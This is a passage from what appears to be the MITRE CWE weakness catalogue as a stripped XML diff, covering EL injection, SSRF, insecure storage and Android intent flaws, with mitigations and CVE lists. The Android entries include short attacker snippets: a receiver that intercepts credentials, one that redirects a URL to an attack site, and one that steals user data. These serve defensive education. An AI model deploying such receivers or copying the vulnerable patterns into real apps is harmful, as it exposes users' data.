(CWE-325). These steps are often essential for preventing common attacks. + + + + + CVE-2008-1526 + Router does not use a salt with a hash, making it easier to crack passwords. + https://www.cve.org/CVERecord?id=CVE-2008-1526 + + + CVE-2006-1058 + Router does not use a salt with a hash, making it easier to crack passwords. + https://www.cve.org/CVERecord?id=CVE-2006-1058 + + + CVE-2008-4905 + Blogging software uses a hard-coded salt when calculating a password hash. + https://www.cve.org/CVERecord?id=CVE-2008-4905 + + + CVE-2002-1657 + Database server uses the username for a salt when encrypting passwords, simplifying brute force attacks. + https://www.cve.org/CVERecord?id=CVE-2002-1657 + + + CVE-2001-0967 + Server uses a constant salt when encrypting passwords, simplifying brute force attacks. + https://www.cve.org/CVERecord?id=CVE-2001-0967 + + + CVE-2005-0408 + chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass. + https://www.cve.org/CVERecord?id=CVE-2005-0408 + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2013-01-28 + 2.4 + 2013-02-21 + Created with input from members of the secure password hashing community. + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Description + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product constructs all or part of an expression language (EL) statement in a framework such as a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed. + Frameworks such as Java Server Page (JSP) allow a developer to insert executable expressions within otherwise-static content. When the developer is not aware of the executable nature of these expressions and/or does not disable them, then if an attacker can inject expressions, this could lead to code execution or other unexpected behaviors. + + + + + + + + + + Primary + + + + + + + + EL Injection + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Application Data + + + Integrity + Execute Unauthorized Code or Commands + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Avoid adding user-controlled data into an expression interpreter when possible. + + + Implementation + + If user-controlled data must be added to an expression interpreter, one or more of the following should be performed: + + Validate that the user input will not evaluate as an expression + Encode the user input in a way that ensures it is not evaluated as an expression + + + + + System Configuration + Operation + The framework or tooling might allow the developer to disable or deactivate the processing of EL expressions, such as setting the isELIgnored attribute for a JSP page to "true". + + + + + CVE-2021-44228 + Product does not neutralize ${xyz} style expressions, allowing remote code execution. (log4shell vulnerability in log4j) + https://www.cve.org/CVERecord?id=CVE-2021-44228 + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The interrelationships and differences between CWE-917 and CWE-1336 need to be further clarified. + In certain versions of Spring 3.0.5 and earlier, there was a vulnerability (CVE-2011-2730) in which Expression Language tags would be evaluated twice, which effectively exposed any application to EL injection. However, even for later versions, this weakness is still possible depending on configuration. + + + + CWE Content Team + MITRE + 2013-02-15 + 2.4 + 2013-02-21 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Dan Amodio, Dave Wichers + Aspect Security + 2013-02-15 + Suggested adding this weakness and provided references. + + + + + The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. + By providing URLs to unexpected hosts or ports, attackers can make it appear that the server is sending the request, possibly bypassing access controls such as firewalls that prevent the attackers from accessing the URLs directly. The server can be used as a proxy to conduct port scanning of hosts in internal networks, use other URLs such as that can access documents on the system (using file://), or use other protocols such as gopher:// or tftp://, which may provide greater control over the contents of requests. + + + + + + + + + + + XSPA + Cross Site Port Attack + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Application Data + + + Integrity + Execute Unauthorized Code or Commands + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + CVE-2021-26855 + Server Side Request Forgery (SSRF) in mail server, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-26855 + + + CVE-2021-21973 + Server Side Request Forgery in cloud platform, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-21973 + + + CVE-2016-4029 + Chain: incorrect validation of intended decimal-based IP address format (CWE-1286) enables parsing of octal or hexadecimal formats (CWE-1389), allowing bypass of an SSRF protection mechanism (CWE-918). + https://www.cve.org/CVERecord?id=CVE-2016-4029 + + + CVE-2002-1484 + Web server allows attackers to request a URL from another server, including other ports, which allows proxied scanning. + https://www.cve.org/CVERecord?id=CVE-2002-1484 + + + CVE-2004-2061 + CGI script accepts and retrieves incoming URLs. + https://www.cve.org/CVERecord?id=CVE-2004-2061 + + + CVE-2010-1637 + Web-based mail program allows internal network scanning using a modified POP3 port number. + https://www.cve.org/CVERecord?id=CVE-2010-1637 + + + CVE-2009-0037 + URL-downloading library automatically follows redirects to file:// and scp:// URLs + https://www.cve.org/CVERecord?id=CVE-2009-0037 + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the "Server" portion of the SSRF acronym does not necessarily apply. + + + + CWE Content Team + MITRE + 2013-02-17 + 2.4 + 2013-02-21 + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + This entry has been deprecated. It originally came from PLOVER, which sometimes defined "other" and "miscellaneous" categories in order to satisfy exhaustiveness requirements for taxonomies. Within the context of CWE, the use of a more abstract entry is preferred in mapping situations. CWE-75 is a more appropriate mapping. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Name + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Applicable_Platforms, Causal_Nature, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Time_of_Introduction, Type, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Custom Special Character Injection + Insufficient Sanitization of Custom Special Characters + Improper Sanitization of Custom Special Characters + + + + The product operates in an environment in which power is a limited resource that cannot be automatically replenished, but the product does not properly restrict the amount of power that its operation consumes. + + In environments such as embedded or mobile devices, power can be a limited resource such as a battery, which cannot be automatically replenished by the product itself, and the device might not always be directly attached to a reliable power source. If the product uses too much power too quickly, then this could cause the device (and subsequently, the product) to stop functioning until power is restored, or increase the financial burden on the device owner because of increased power costs. + Normal operation of an application will consume power. However, in some cases, an attacker could cause the application to consume more power than intended, using components such as: + + Display + CPU + Disk I/O + GPS + Sound + Microphone + USB interface + + + + + + + + + + + + + Architecture and Design + + + + + Availability + DoS: Resource Consumption (Other) + DoS: Crash, Exit, or Restart + The power source could be drained, causing the application - and the entire device - to cease functioning. + + + + + Part 3-3 + Req SR 6.2 + + + Part 4-2 + Req CR 6.2 + + + Part 4-1 + Req SD-4 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2013-06-11 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + + + + The product stores sensitive information in a file system or device that does not have built-in access control. + + While many modern file systems or devices utilize some form of access control in order to restrict access to data, not all storage mechanisms have this capability. For example, memory cards, floppy disks, CDs, and USB devices are typically made accessible to any user within the system. This can become a problem when sensitive data is stored in these mechanisms in a multi-user environment, because anybody on the system can read or write this data. + On Android devices, external storage is typically globally readable and writable by other applications on the device. External storage may also be easily accessible through the mobile device's USB connection or physically accessible through the device's memory card port. + + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Application Data + Read Files or Directories + Attackers can read sensitive information by accessing the unrestricted storage mechanism. + + + Integrity + Modify Application Data + Modify Files or Directories + Attackers can modify or delete sensitive information by accessing the unrestricted storage mechanism. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2013-06-22 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product stores sensitive information without properly limiting read or write access by unauthorized actors. + If read access is not properly restricted, then attackers can steal the sensitive information. If write access is not properly restricted, then attackers can modify and possibly delete the data, causing incorrect results and possibly a denial of service. + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + System Configuration + + + + + Confidentiality + Read Application Data + Read Files or Directories + Attackers can read sensitive information by accessing the unrestricted storage mechanism. + + + Integrity + Modify Application Data + Modify Files or Directories + Attackers can overwrite sensitive information by accessing the unrestricted storage mechanism. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data. While data tampering would be visible upon inspection, the integrity and availability of the data is compromised prior to the audit. + This is a high-level entry that includes children from various parts of the CWE research view (CWE-1000). Currently, most of the information is in these child entries. This entry will be made more comprehensive in later CWE versions. + + + + CWE Content Team + MITRE + 2013-06-23 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Common_Consequences, Relationship_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Mathias Millet + GitGuardian + 2022-07-08 + Suggested changes to Common Consequences and Relationship Notes. + + + + + The product establishes a communication channel to (or from) an endpoint for privileged or protected operations, but it does not properly ensure that it is communicating with the correct endpoint. + + Attackers might be able to spoof the intended endpoint from a different system or process, thus gaining the same level of access as the intended endpoint. + While this issue frequently involves authentication between network-based clients and servers, other types of communication channels and endpoints can have this weakness. + + + + + + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Confidentiality + Gain Privileges or Assume Identity + If an attacker can spoof the endpoint, the attacker gains all the privileges that were intended for the original endpoint. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2013-06-23 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2014-02-18 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2022-10-13 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Improper Authentication of Endpoint in a Communication Channel + + + + The product establishes a communication channel with an endpoint and receives a message from that endpoint, but it does not sufficiently ensure that the message was not modified during transmission. + Attackers might be able to modify the message and spoof the endpoint by interfering with the data as it crosses the network or by redirecting the connection to a system under their control. + + + + + + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Confidentiality + Gain Privileges or Assume Identity + If an attackers can spoof the endpoint, the attacker gains all the privileges that were intended for the original endpoint. + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry should be made more comprehensive in later CWE versions, as it is likely an important design flaw that underlies (or chains to) other weaknesses. + + + + CWE Content Team + MITRE + 2013-06-23 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The Android application uses a Broadcast Receiver that receives an Intent but does not properly verify that the Intent came from an authorized source. + Certain types of Intents, identified by action string, can only be broadcast by the operating system itself, not by third-party applications. However, when an application registers to receive these implicit system intents, it is also registered to receive any explicit intents. While a malicious application cannot send an implicit system intent, it can send an explicit intent to the target application, which may assume that any received intent is a valid implicit system intent and not an explicit intent from another application. This may lead to unintended behavior. + + + + + + + + + + Intent Spoofing + + + + + Architecture and Design + + + + + Integrity + Gain Privileges or Assume Identity + Another application can impersonate the operating system and cause the software to perform an unintended action. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Before acting on the Intent, check the Intent Action to make sure it matches the expected System action. + + + + + The following example demonstrates the weakness. + + <manifest package="com.example.vulnerableApplication"> + <application> + ... + + + <receiver android:name=".ShutdownReceiver"><intent-filter><action android:name="android.intent.action.ACTION_SHUTDOWN" /></intent-filter></receiver> + + + ... + + </application> + </manifest> + + The ShutdownReceiver class will handle the intent: + + + + ... + IntentFilter filter = new IntentFilter(Intent.ACTION_SHUTDOWN);BroadcastReceiver sReceiver = new ShutDownReceiver();registerReceiver(sReceiver, filter); + ... + + public class ShutdownReceiver extends BroadcastReceiver {@Overridepublic void onReceive(final Context context, final Intent intent) {mainActivity.saveLocalData();mainActivity.stopActivity();}} + + Because the method does not confirm that the intent action is the expected system intent, any received intent will trigger the shutdown procedure, as shown here: + + window.location = examplescheme://method?parameter=value + + An attacker can use this behavior to cause a denial of service. + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry will be made more comprehensive in later CWE versions. + + + + CWE Content Team + MITRE + 2013-06-24 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2014-02-18 + updated Alternate_Terms, Demonstrative_Examples, Description, References + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains. + + The attacks and consequences of improperly exporting a component may depend on the exported component: + + If access to an exported Activity is not restricted, any application will be able to launch the activity. This may allow a malicious application to gain access to sensitive information, modify the internal state of the application, or trick a user into interacting with the victim application while believing they are still interacting with the malicious application. + If access to an exported Service is not restricted, any application may start and bind to the Service. Depending on the exposed functionality, this may allow a malicious application to perform unauthorized actions, gain access to sensitive information, or corrupt the internal state of the application. + If access to a Content Provider is not restricted to only the expected applications, then malicious applications might be able to access the sensitive data. Note that in Android before 4.2, the Content Provider is automatically exported unless it has been explicitly declared as NOT exported. + + + + + + + + + + + + There are three types of components that can be exported in an Android application. + + An Activity is an application component that provides a UI for users to interact with. A typical application will have multiple Activity screens that perform different functions, such as a main Activity screen and a separate settings Activity screen. + A Service is an application component that is started by another component to execute an operation in the background, even after the invoking component is terminated. Services do not have a UI component visible to the user. + The Content Provider mechanism can be used to share data with other applications or internally within the same application. + + + + + + Architecture and Design + + + + + Availability + Integrity + Unexpected State + DoS: Crash, Exit, or Restart + DoS: Instability + Varies by Context + Other applications, possibly untrusted, can launch the Activity. + + + Availability + Integrity + Unexpected State + Gain Privileges or Assume Identity + DoS: Crash, Exit, or Restart + DoS: Instability + Varies by Context + Other applications, possibly untrusted, can bind to the Service. + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + Other applications, possibly untrusted, can read or modify the data that is offered by the Content Provider. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Build and Compilation + Attack Surface Reduction + If they do not need to be shared by other applications, explicitly mark components with android:exported="false" in the application manifest. + + + Build and Compilation + Attack Surface Reduction + If you only intend to use exported components between related apps under your control, use android:protectionLevel="signature" in the xml manifest to restrict access to applications signed by you. + + + Build and Compilation + Architecture and Design + Attack Surface Reduction + Limit Content Provider permissions (read/write) as appropriate. + + + Build and Compilation + Architecture and Design + Separation of Privilege + Limit Content Provider permissions (read/write) as appropriate. + + + + + This application is exporting an activity and a service in its manifest.xml: + + <activity android:name="com.example.vulnerableApp.mainScreen"> + + + ... + <intent-filter><action android:name="com.example.vulnerableApp.OPEN_UI" /><category android:name="android.intent.category.DEFAULT" /></intent-filter> + ... + + + </activity><service android:name="com.example.vulnerableApp.backgroundService"> + + + ... + <intent-filter><action android:name="com.example.vulnerableApp.START_BACKGROUND" /></intent-filter> + ... + + + </service> + + Because these components have intent filters but have not explicitly set 'android:exported=false' elsewhere in the manifest, they are automatically exported so that any other application can launch them. This may lead to unintended behavior or exploits. + + + This application has created a content provider to enable custom search suggestions within the application: + + <provider>android:name="com.example.vulnerableApp.searchDB"android:authorities="com.example.vulnerableApp.searchDB"></provider> + + Because this content provider is only intended to be used within the application, it does not need to be exported. However, in Android before 4.2, it is automatically exported thus potentially allowing malicious applications to access sensitive information. + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2013-07-02 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2014-01-22 + Critical + Expanded entry to be more general and include all types of Android components that may be improperly exported. + + + CWE Content Team + MITRE + 2014-02-18 + updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Background_Details + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Improper Restriction of Content Provider Export to Other Applications + + + + The Android application uses an implicit intent for transmitting sensitive data to other applications. + + Since an implicit intent does not specify a particular application to receive the data, any application can process the intent by using an Intent Filter for that intent. This can allow untrusted applications to obtain sensitive data. There are two variations on the standard broadcast intent, ordered and sticky. + Ordered broadcast intents are delivered to a series of registered receivers in order of priority as declared by the Receivers. A malicious receiver can give itself a high priority and cause a denial of service by stopping the broadcast from propagating further down the chain. There is also the possibility of malicious data modification, as a receiver may also alter the data within the Intent before passing it on to the next receiver. The downstream components have no way of asserting that the data has not been altered earlier in the chain. + Sticky broadcast intents remain accessible after the initial broadcast. An old sticky intent will be broadcast again to any new receivers that register for it in the future, greatly increasing the chances of information exposure over time. Also, sticky broadcasts cannot be protected by permissions that may apply to other kinds of intents. + In addition, any broadcast intent may include a URI that references data that the receiving component does not normally have the privileges to access. The sender of the intent can include special privileges that grant the receiver read or write access to the specific URI included in the intent. A malicious receiver that intercepts this intent will also gain those privileges and be able to read or write the resource at the specified URI. + + + + + + + + + + + + Architecture and Design + + + + + Confidentiality + Read Application Data + Other applications, possibly untrusted, can read the data that is offered through the Intent. + + + Integrity + Varies by Context + The application may handle responses from untrusted applications on the device, which could cause it to perform unexpected or unauthorized actions. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + If the application only requires communication with its own components, then the destination is always known, and an explicit intent could be used. + + + + + This application wants to create a user account in several trusted applications using one broadcast intent: + + Intent intent = new Intent();intent.setAction("com.example.CreateUser");intent.putExtra("Username", uname_string);intent.putExtra("Password", pw_string);sendBroadcast(intent); + + This application assumes only the trusted applications will be listening for the action. A malicious application can register for this action and intercept the user's login information, as below: + + IntentFilter filter = new IntentFilter("com.example.CreateUser");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); + + When a broadcast contains sensitive information, create an allowlist of applications that can receive the action using the application's manifest file, or programmatically send the intent to each individual intended receiver. + + + This application interfaces with a web service that requires a separate user login. It creates a sticky intent, so that future trusted applications that also use the web service will know who the current user is: + + Intent intent = new Intent();intent.setAction("com.example.service.UserExists");intent.putExtra("Username", uname_string);sendStickyBroadcast(intent); + + + IntentFilter filter = new IntentFilter("com.example.service.UserExists");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); + + Sticky broadcasts can be read by any application at any time, and so should never contain sensitive information such as a username. + + + This application is sending an ordered broadcast, asking other applications to open a URL: + + Intent intent = new Intent();intent.setAction("com.example.OpenURL");intent.putExtra("URL_TO_OPEN", url_string);sendOrderedBroadcastAsUser(intent); + + Any application in the broadcast chain may alter the data within the intent. This malicious application is altering the URL to point to an attack site: + + public class CallReceiver extends BroadcastReceiver {@Overridepublic void onReceive(Context context, Intent intent) {String Url = intent.getStringExtra(Intent.URL_TO_OPEN);attackURL = "www.example.com/attack?" + Url;setResultData(attackURL);}} + + The final receiving application will then open the attack URL. Where possible, send intents to specific trusted applications instead of using a broadcast chain. + + + This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes. + + Intent intent = new Intent();intent.setAction("com.example.BackupUserData");intent.setData(file_uri);intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);sendBroadcast(intent); + + + public class CallReceiver extends BroadcastReceiver {@Overridepublic void onReceive(Context context, Intent intent) {Uri userData = intent.getData();stealUserData(userData);}} + + Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user's data. + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2013-07-09 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples, Description, References + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses CRLF (carriage return 